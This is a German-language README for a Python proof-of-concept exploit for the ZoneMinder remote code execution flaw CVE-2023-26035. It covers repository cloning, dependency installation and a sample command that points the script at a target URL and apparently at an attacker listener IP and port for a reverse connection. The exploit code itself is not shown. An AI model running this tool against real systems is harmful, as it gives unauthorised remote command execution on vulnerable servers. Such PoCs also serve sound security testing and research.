
Dies ist ein in Python geschriebenes Skript, das die Ausnutzung der Sicherheitslücke von Zoneminder ermöglicht, die in CVE-2023-26035 beschrieben ist.
Dies ist ein in Python geschriebenes Skript, das die Ausnutzung des Zoneminder-Sicherheitsfehlers ermöglicht, der in CVE-2023-26035 beschrieben ist. Das System ist in Versionen vor 1.36.33 und 1.37.33 verwundbar.
Klonen Sie das Repository auf Ihre Maschine und installieren Sie die Abhängigkeiten mit pip (es wird empfohlen, virtualenv zu verwenden, um eine Umgebung zu erstellen, die diese Installationen von globalen Installationen trennt).
git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt
Das Skript benötigt die Ziel-URL mit dem Zoneminder-Wurzelpfad (z. B. http://example.com/zm, http://example.com oder http://example.com/zoneminder)**, die IP oder Domäne für die Zielmaschine, zu der eine Verbindung hergestellt werden soll, und den Port für die Zielmaschine, zu der eine Verbindung hergestellt werden soll. Hier ist ein Beispiel:
python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443
